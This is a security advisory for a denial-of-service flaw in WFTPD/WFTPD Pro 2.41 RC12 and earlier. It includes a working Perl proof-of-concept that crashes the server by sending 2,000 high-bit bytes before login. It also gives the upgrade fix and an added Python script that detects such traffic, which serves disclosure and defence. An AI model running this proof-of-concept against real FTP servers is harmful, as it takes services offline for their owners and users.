COMMAND

    WFTPD

SYSTEMS AFFECTED

    WFTPD/WFTPD Pro 2.41 RC12 and prior

PROBLEM

    Michael (Blue Panda) found the following.  WFTPD will crash if a
    large string consisting of characters 128-255 is received.  A
    valid user/pass combination is not required to take advantage of
    this flaw.

    Proof of concept:

    #!/usr/bin/perl
    #
    # WFTPD/WFTPD Pro 2.41 RC12 denial-of-service
    # Blue Panda - bluepanda@dwarf.box.sk
    # http://bluepanda.box.sk/
    #
    # ----------------------------------------------------------
    # Disclaimer: this file is intended as proof of concept, and
    # is not intended to be used for illegal purposes. I accept
    # no responsibility for damage incurred by the use of it.
    # ----------------------------------------------------------
    #
    # Sends WFTPD string consisting of characters > 127, causing it to crash.
    #
    
    use IO::Socket;
    
    $host = "ftp.host.com" ;
    $port = "21";
    $sleepfor = 4;
    
    print "Connecting to $host:$port...";
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
    print "done.\n";
    
    $buffer = "\x80" x 2000;
    
    print $socket "$buffer\n";
    $counter = 0;
    print "Sleeping for $sleepfor seconds.";
    while($counter < $sleepfor) {
            sleep(1);
            print ".";
            $counter += 1;
    }
    print "\n";
    
    close($socket);

SOLUTION

    A fix has been released.  WFTPD/WFTPD Pro 2.41 RC13 is not affected.
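
    For hosts that cannot be upgraded immediately, the following added
    example (not part of the original advisory or of WFTPD) flags the
    traffic pattern described under PROBLEM in a captured client-to-server
    FTP control stream, without relying on login state.  The thresholds,
    function names and sample streams are assumptions made for
    illustration.

```python
import re

# Thresholds are assumptions for this example, not values from the advisory.
MAX_LINE = 512   # longest control-channel line treated as normal
HIGH_RUN = 64    # consecutive bytes in 128-255 treated as a "large string"

VERB = re.compile(rb"^[A-Za-z]{3,4}(?: |$)")          # e.g. USER, PASS, CWD
HIGH = re.compile(rb"[\x80-\xff]{%d,}" % HIGH_RUN)    # long high-bit run


def inspect_line(line):
    """Return the reasons one client-to-server line is suspicious, or []."""
    reasons = []
    if len(line) > MAX_LINE:
        reasons.append("overlong")
    if HIGH.search(line):
        reasons.append("high-bit-run")
    # A missing verb is only reported alongside another finding, so that
    # short junk lines do not alert on their own.
    if reasons and not VERB.match(line):
        reasons.append("no-command-verb")
    return reasons


def inspect_stream(data):
    """Flag lines in a captured client-to-server FTP control stream.

    An unterminated final fragment is inspected too, because a sender
    may never send the line ending.
    """
    alerts = []
    for number, raw in enumerate(data.split(b"\n"), start=1):
        reasons = inspect_line(raw.rstrip(b"\r"))
        if reasons:
            alerts.append((number, reasons))
    return alerts


# Constructed sample input (not real traffic).
BENIGN = (b"USER anonymous\r\nPASS guest@example.com\r\n"
          b"RETR r\xc3\xa9sum\xc3\xa9.txt\r\nQUIT\r\n")
PRE_AUTH_FLOOD = b"\x80" * 2000 + b"\n"          # same shape as the advisory's string
UNTERMINATED = b"USER test\r\n" + b"\xff" * 100  # no line ending sent

if __name__ == "__main__":
    for name, stream in [("benign", BENIGN), ("flood", PRE_AUTH_FLOOD),
                         ("unterminated", UNTERMINATED)]:
        print(name, inspect_stream(stream))
```

    The UTF-8 file name in the benign stream contains bytes above 127 but
    raises no alert, since only long runs of such bytes are flagged.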